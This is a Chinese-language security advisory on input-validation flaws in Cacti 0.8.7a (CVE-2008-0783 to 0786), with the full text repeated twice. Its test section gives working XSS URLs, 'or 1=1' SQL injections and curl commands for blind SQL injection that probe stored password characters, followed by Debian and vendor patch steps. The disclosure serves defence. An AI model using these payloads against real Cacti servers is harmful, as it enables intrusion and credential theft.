Cacti多個輸入驗證漏洞
發佈日期:2008-02-12
更新日期:2008-07-16
受影響系統:
Raxnet Cacti 0.8.7a
不受影響系統:
Raxnet Cacti 0.8.7b
描述:BUGTRAQ ID: 27749
CVE(CAN) ID: CVE-2008-0786,CVE-2008-0785,CVE-2008-0784,CVE-2008-0783
Cacti是一款輪循數據庫(RRD)工具,可幫助從數據庫信息創建圖形,有多個Linux版本。
Cacti中存在多個輸入驗證錯誤,允許遠程***者執行HTTP響應拆分、跨站腳本或SQL注入***。
1) 沒有正確地過濾對多個參數的輸入便用在了SQL查詢中,這允許***者執行SQL注入***。
2) 沒有正確地過濾對多個參數的輸入便返回給了用戶,這允許***者向用戶瀏覽器中注入並執行任意HTML和腳本代碼,或注入任意HTTP頭,而該頭會包含在發送給用戶的響應中。
<*來源:Francesco Ongaro ([email][email protected][/email])
鏈接:[url]http://secunia.com/advisories/28872/[/url]
[url]http://marc.info/?l=bugtraq%26amp;m=120284658901282%26amp;w=2[/url]
[url]http://www.debian.org/security/2008/dsa-1569[/url]
*>
測試方法:<font color='#FF0000'><p align='center'>警 告
以下程序(方法)可能帶有***性,僅供安全研究與教學之用。使用者風險自負!</p></font>[url]http://www.example.com/cacti/graph.ph[/url] ... 6#39;%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
[url]http://www.example.com/cacti/graph_vi[/url] ... ouseover=javascript:alert(/XSS/)
[url]http://www.example.com/cacti/index.ph[/url] ... ion=foo/%3Cscript%3Ealert(%26#39;XSS%26#39;)%3C/script%3E
[url]http://www.example.com/cacti/graph_vi[/url] ... 0%26#39;1%26#39;=%26#39;1
[url]http://www.example.com/cacti/tree.php[/url] ... eaf_id=1%20or%201%20=%201
curl "[url]http://www.example.com/cacti/graph_xp[/url] ... hp?local_graph_id=1" -d \
"local_graph_id=1%26#39;" -H "Cookie: Cacti=<cookie value>"
curl "[url]http://www.example.com/cacti/tree.php?action=edit%26amp;id=1[/url]" -d \
"id=sql%26#39;" -H "Cookie: Cacti=<cookie value>"
curl -v "[url]http://www.example.com/cacti/index.php/sql.php[/url]" -d \
"login_username=foo%26#39;+or+ascii(substring(password,1,1))>56#%26amp;action=login"
$ curl -v "[url]http://www.example.com/cacti/index.php/sql.php[/url]" -d \
"login_username=foo%26#39;+or+ascii(substring(password,1,1))<56#%26amp;action=login"
* About to connect() to [url]www.example.com[/url] port 80 (#0)
* Trying 127.0.0.1... connected
* Connected to [url]www.example.com[/url] (127.0.0.1) port 80 (#0)
> POST /cacti-0.8.7a/index.php/sql.php HTTP/1.1
> User-Agent: curl/1.1.1 (i986-gnu-ms-bsd) cacalib/3.6.9 OpenTelnet/0.1
> Host: [url]www.example.com[/url]
> Accept: */*
> Content-Length: 71
> Content-Type: application/x-www-form-urlencoded
>
< HTTP/1.1 200 OK
< Date: Mon, 17 Dec 2007 19:29:34 GMT
< Server: Apache
< X-Powered-By: PHP/1.2.3-linuxz
< Content-Length: 355
< Content-Type: text/html
AAAAAAAAA: SELECT * FROM user_auth WHERE username = %26#39;foo%26#39; or
ascii(substring(password,1,1))<56#%26#39; AND password = md5(%26#39;%26#39;) AND realm=0
Warning: Cannot modify header information - headers already
sent by (output started at /home/x/cacti-0.8.7a/auth_login.php:126)
in /home/x/cacti-0.8.7a/auth_login.php on line 200
* Connection #0 to host [url]www.example.com[/url] left intact
* Closing connection #0
$ curl -kis "[url]http://www.example.com/cacti-0.8.7a/index.php/sql.php[/url]" -d \
"login_username=foo%26#39;+or+ascii(substring(password,1,1))>56#%26amp;action=login" \
| head -n1
HTTP/1.1 200 OK
$ curl -kis "[url]http://www.example.com/cacti-0.8.7a/index.php/sql.php[/url]" -d \
"login_username=foo%26#39;+or+ascii(substring(password,1,1))<56#%26amp;action=login" \
| head -n1
HTTP/1.1 302 Found
<
建議:廠商補丁:
Debian
------
Debian已經爲此發佈了一個安全公告(DSA-1569-3)以及相應補丁:
DSA-1569-3:New cacti packages fix regression
鏈接:[url]http://www.debian.org/security/2008/dsa-1569[/url]
補丁下載:
Source archives:
[url]http://security.debian.org/pool/updat[/url] ... /cacti_0.8.6i.orig.tar.gz
Size/MD5 checksum: 1122700 341b5828d95db91f81f5fbba65411d63
[url]http://security.debian.org/pool/updat[/url] ... acti/cacti_0.8.6i-3.5.dsc
Size/MD5 checksum: 581 6184cdfb6a4e7a5372d684556aa46537
[url]http://security.debian.org/pool/updat[/url] ... /cacti_0.8.6i-3.5.diff.gz
Size/MD5 checksum: 37154 dc53c27c1584999db93a83be1bf43879
Architecture independent packages:
[url]http://security.debian.org/pool/updat[/url] ... /cacti_0.8.6i-3.5_all.deb
Size/MD5 checksum: 958000 f496c887950457535b223bf90988eb72
補丁安裝方法:
1. 手工安裝補丁包:
首先,使用下面的命令來下載補丁軟件:
# wget url (url是補丁下載鏈接地址)
然後,使用下面的命令來安裝補丁:
# dpkg -i file.deb (file是相應的補丁名)
2. 使用apt-get自動安裝補丁包:
首先,使用下面的命令更新內部數據庫:
# apt-get update
然後,使用下面的命令安裝更新軟件包:
# apt-get upgrade
Raxnet
------
目前廠商已經發布了升級補丁以修復這個安全問題,請到廠商的主頁下載:
[url]http://www.cacti.net/release_notes_0_8_7b.php[/url]
發佈日期:2008-02-12
更新日期:2008-07-16
受影響系統:
Raxnet Cacti 0.8.7a
不受影響系統:
Raxnet Cacti 0.8.7b
描述:BUGTRAQ ID: 27749
CVE(CAN) ID: CVE-2008-0786,CVE-2008-0785,CVE-2008-0784,CVE-2008-0783
Cacti是一款輪循數據庫(RRD)工具,可幫助從數據庫信息創建圖形,有多個Linux版本。
Cacti中存在多個輸入驗證錯誤,允許遠程***者執行HTTP響應拆分、跨站腳本或SQL注入***。
1) 沒有正確地過濾對多個參數的輸入便用在了SQL查詢中,這允許***者執行SQL注入***。
2) 沒有正確地過濾對多個參數的輸入便返回給了用戶,這允許***者向用戶瀏覽器中注入並執行任意HTML和腳本代碼,或注入任意HTTP頭,而該頭會包含在發送給用戶的響應中。
<*來源:Francesco Ongaro ([email][email protected][/email])
鏈接:[url]http://secunia.com/advisories/28872/[/url]
[url]http://marc.info/?l=bugtraq%26amp;m=120284658901282%26amp;w=2[/url]
[url]http://www.debian.org/security/2008/dsa-1569[/url]
*>
測試方法:<font color='#FF0000'><p align='center'>警 告
以下程序(方法)可能帶有***性,僅供安全研究與教學之用。使用者風險自負!</p></font>[url]http://www.example.com/cacti/graph.ph[/url] ... 6#39;%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
[url]http://www.example.com/cacti/graph_vi[/url] ... ouseover=javascript:alert(/XSS/)
[url]http://www.example.com/cacti/index.ph[/url] ... ion=foo/%3Cscript%3Ealert(%26#39;XSS%26#39;)%3C/script%3E
[url]http://www.example.com/cacti/graph_vi[/url] ... 0%26#39;1%26#39;=%26#39;1
[url]http://www.example.com/cacti/tree.php[/url] ... eaf_id=1%20or%201%20=%201
curl "[url]http://www.example.com/cacti/graph_xp[/url] ... hp?local_graph_id=1" -d \
"local_graph_id=1%26#39;" -H "Cookie: Cacti=<cookie value>"
curl "[url]http://www.example.com/cacti/tree.php?action=edit%26amp;id=1[/url]" -d \
"id=sql%26#39;" -H "Cookie: Cacti=<cookie value>"
curl -v "[url]http://www.example.com/cacti/index.php/sql.php[/url]" -d \
"login_username=foo%26#39;+or+ascii(substring(password,1,1))>56#%26amp;action=login"
$ curl -v "[url]http://www.example.com/cacti/index.php/sql.php[/url]" -d \
"login_username=foo%26#39;+or+ascii(substring(password,1,1))<56#%26amp;action=login"
* About to connect() to [url]www.example.com[/url] port 80 (#0)
* Trying 127.0.0.1... connected
* Connected to [url]www.example.com[/url] (127.0.0.1) port 80 (#0)
> POST /cacti-0.8.7a/index.php/sql.php HTTP/1.1
> User-Agent: curl/1.1.1 (i986-gnu-ms-bsd) cacalib/3.6.9 OpenTelnet/0.1
> Host: [url]www.example.com[/url]
> Accept: */*
> Content-Length: 71
> Content-Type: application/x-www-form-urlencoded
>
< HTTP/1.1 200 OK
< Date: Mon, 17 Dec 2007 19:29:34 GMT
< Server: Apache
< X-Powered-By: PHP/1.2.3-linuxz
< Content-Length: 355
< Content-Type: text/html
AAAAAAAAA: SELECT * FROM user_auth WHERE username = %26#39;foo%26#39; or
ascii(substring(password,1,1))<56#%26#39; AND password = md5(%26#39;%26#39;) AND realm=0
Warning: Cannot modify header information - headers already
sent by (output started at /home/x/cacti-0.8.7a/auth_login.php:126)
in /home/x/cacti-0.8.7a/auth_login.php on line 200
* Connection #0 to host [url]www.example.com[/url] left intact
* Closing connection #0
$ curl -kis "[url]http://www.example.com/cacti-0.8.7a/index.php/sql.php[/url]" -d \
"login_username=foo%26#39;+or+ascii(substring(password,1,1))>56#%26amp;action=login" \
| head -n1
HTTP/1.1 200 OK
$ curl -kis "[url]http://www.example.com/cacti-0.8.7a/index.php/sql.php[/url]" -d \
"login_username=foo%26#39;+or+ascii(substring(password,1,1))<56#%26amp;action=login" \
| head -n1
HTTP/1.1 302 Found
<
建議:廠商補丁:
Debian
------
Debian已經爲此發佈了一個安全公告(DSA-1569-3)以及相應補丁:
DSA-1569-3:New cacti packages fix regression
鏈接:[url]http://www.debian.org/security/2008/dsa-1569[/url]
補丁下載:
Source archives:
[url]http://security.debian.org/pool/updat[/url] ... /cacti_0.8.6i.orig.tar.gz
Size/MD5 checksum: 1122700 341b5828d95db91f81f5fbba65411d63
[url]http://security.debian.org/pool/updat[/url] ... acti/cacti_0.8.6i-3.5.dsc
Size/MD5 checksum: 581 6184cdfb6a4e7a5372d684556aa46537
[url]http://security.debian.org/pool/updat[/url] ... /cacti_0.8.6i-3.5.diff.gz
Size/MD5 checksum: 37154 dc53c27c1584999db93a83be1bf43879
Architecture independent packages:
[url]http://security.debian.org/pool/updat[/url] ... /cacti_0.8.6i-3.5_all.deb
Size/MD5 checksum: 958000 f496c887950457535b223bf90988eb72
補丁安裝方法:
1. 手工安裝補丁包:
首先,使用下面的命令來下載補丁軟件:
# wget url (url是補丁下載鏈接地址)
然後,使用下面的命令來安裝補丁:
# dpkg -i file.deb (file是相應的補丁名)
2. 使用apt-get自動安裝補丁包:
首先,使用下面的命令更新內部數據庫:
# apt-get update
然後,使用下面的命令安裝更新軟件包:
# apt-get upgrade
Raxnet
------
目前廠商已經發布了升級補丁以修復這個安全問題,請到廠商的主頁下載:
[url]http://www.cacti.net/release_notes_0_8_7b.php[/url]